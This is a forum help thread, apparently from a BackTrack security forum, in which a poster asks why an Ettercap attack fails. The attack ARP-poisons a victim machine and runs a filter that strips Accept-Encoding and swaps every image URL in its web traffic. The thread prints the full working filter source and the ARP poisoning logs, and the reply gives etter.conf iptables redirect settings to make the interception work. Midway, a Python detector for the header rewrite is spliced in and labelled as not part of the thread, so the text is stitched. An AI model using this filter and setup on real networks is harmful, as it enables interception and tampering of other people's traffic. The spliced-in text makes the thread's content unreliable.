Thread: Ettercap Image Filter Problem! HELP!

  1. #1
    Just burned his ISO | Join Date: Sep 2009 | Posts: 1

    Ettercap Image Filter Problem! HELP!

    Okay, I'm sorry if this has been posted before... but I've searched all over the place and couldn't find the answer ANYWHERE!

    I am running Windows XP SP3, this is my attacking computer, and my victim is running the same.

    My Goal: I am using Irongeek's tutorial on image filtering and I want to use his exact code to show the jollypwn symbol.

    My Problem: I compile the filter and it compiles perfectly fine. I then proceed to open ettercap, I select unified sniffing on my Broadcom 802.11g network, and after I am connected I sniff for hosts. I scan for all the hosts on my network perfectly fine. I set the victim as target 1 and target 2. Then I set up a MITM ARP Poison attack on the victim. It completes fine with the confirmation:

    Listening on \Device\NPF_{1D779372-ECC6-49EB-8005-4AF5BD58FC14}... (Ethernet)

    \Device\NPF_{1D779372-ECC6-49EB-8005-4AF5BD58FC14} -> 00:23:08:5E:55:6D 192.168.254.2 255.255.255.0

    SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
    26 plugins
    39 protocol dissectors
    53 ports monitored
    7587 mac vendor fingerprint
    1698 tcp OS fingerprint
    2183 known services
    Randomizing 255 hosts for scanning...
    Scanning the whole netmask for 255 hosts...
    4 hosts added to the hosts list...
    Host 192.168.254.5 added to TARGET1
    Host 192.168.254.5 added to TARGET2

    ARP poisoning victims:

    GROUP 1 : 192.168.254.5 00:23:08:5E:97:50

    GROUP 2 : 192.168.254.5 00:23:08:5E:97:50

    Then I select the jollypwn.ef filter, and it completes fine with the confirmation:

    Content filters loaded from C:\Ettercap\jollypwn.ef...

    Then I begin to sniff, and everything seems like it is running perfectly fine. I get these confirmations:

    Starting Unified sniffing...

    Filter Ran.
    Filter Ran.
    Filter Ran.
    ~snip~
    Filter Ran.
    Filter Ran.
    Filter Ran.

    Now here's the main problem...

    When I start the sniffing, the host for ettercap should start filtering the images and swapping them for the jollypwn symbol... but instead... the victim acts as if I am filtering nothing, and the page source stays unchanged....

    Yes, I have cleared the DNS cache and internet cache before testing it.

    This is the filter I used:


    ############################################################################
    #                                                                          #
    # Jolly Pwned -- ig.filter -- filter source file                           #
    #                                                                          #
    # By Irongeek. based on code from ALoR & NaGA                              #
    # Along with some help from Kev and jon.dmml                               #
    # [***same url as the origional, blocked for forum purposes***]            #
    # Ettercap :: View topic - HowTo do filters (Yahoo example)                #
    #                                                                          #
    # This program is free software; you can redistribute it and/or modify     #
    # it under the terms of the GNU General Public License as published by     #
    # the Free Software Foundation; either version 2 of the License, or        #
    # (at your option) any later version.                                      #
    #                                                                          #
    ############################################################################
    if (ip.proto == TCP && tcp.dst == 80) {
       if (search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Rubbish!");
          # note: replacement string is same length as original string
          msg("zapped Accept-Encoding!\n");
       }
    }
    if (ip.proto == TCP && tcp.src == 80) {
       replace("img src=", "img src=\"***same url as the origional, blocked for forum purposes***\" ");
       replace("IMG SRC=", "img src=\"***same url as the origional, blocked for forum purposes***\" ");
       msg("Filter Ran.\n");
    }

    I know about the no spoon feeding rule but I've searched everywhere and nobody seems to relate to my problem... please help!

    Thank you ahead of time!
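
A defensive counterpart to the filter quoted in this post, added here as an example that is not part of the original thread: the filter's first rule overwrites the `Accept-Encoding` header name with a same-length string, so a server or sensor that sees the plaintext request can flag a request that has no `Accept-Encoding` header but carries a content-coding list under an unfamiliar 15-character name. The function names, host name and sample requests are constructed for illustration.

```python
import re

TARGET = "Accept-Encoding"
# Content-coding tokens a browser lists in Accept-Encoding.
CODINGS = re.compile(r"\b(gzip|deflate|br|identity|compress)\b", re.I)

def parse_headers(raw: bytes) -> dict:
    """Return {name: value} from the head of a raw HTTP/1.x request."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    headers = {}
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip()] = value.strip()
    return headers

def rewritten_encoding_header(raw: bytes):
    """Name of the header that replaced Accept-Encoding in transit, or None."""
    headers = parse_headers(raw)
    if any(h.lower() == TARGET.lower() for h in headers):
        return None  # header arrived intact
    for name, value in headers.items():
        # A length-preserving rewrite leaves the coding list under a new
        # name with exactly as many characters as "Accept-Encoding".
        if len(name) == len(TARGET) and CODINGS.search(value):
            return name
    return None

# Constructed sample requests (not captured traffic).
CLEAN = (b"GET / HTTP/1.1\r\nHost: example.test\r\n"
         b"Accept-Encoding: gzip, deflate\r\n\r\n")
TAMPERED = (b"GET / HTTP/1.1\r\nHost: example.test\r\n"
            b"Accept-Rubbish!: gzip, deflate\r\n\r\n")
NO_ENCODING = (b"GET / HTTP/1.1\r\nHost: example.test\r\n"
               b"Accept-Language: en-US,en;q=0.9\r\n\r\n")

if __name__ == "__main__":
    for label, req in [("clean", CLEAN), ("tampered", TAMPERED),
                       ("no-encoding", NO_ENCODING)]:
        print(label, "->", rewritten_encoding_header(req))
```

The check only applies to plaintext HTTP on port 80, which is the only traffic the quoted filter matches.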

  2. #2
    Just burned his ISO | Join Date: Jan 2010 | Location: / | Posts: 16

    This forum is for BackTrack, not Windows. Why don't you boot BackTrack and edit your etter.conf file,

    # if you use iptables:
    #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"
    #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"

    to this

    # if you use iptables:
    redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"
    redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"
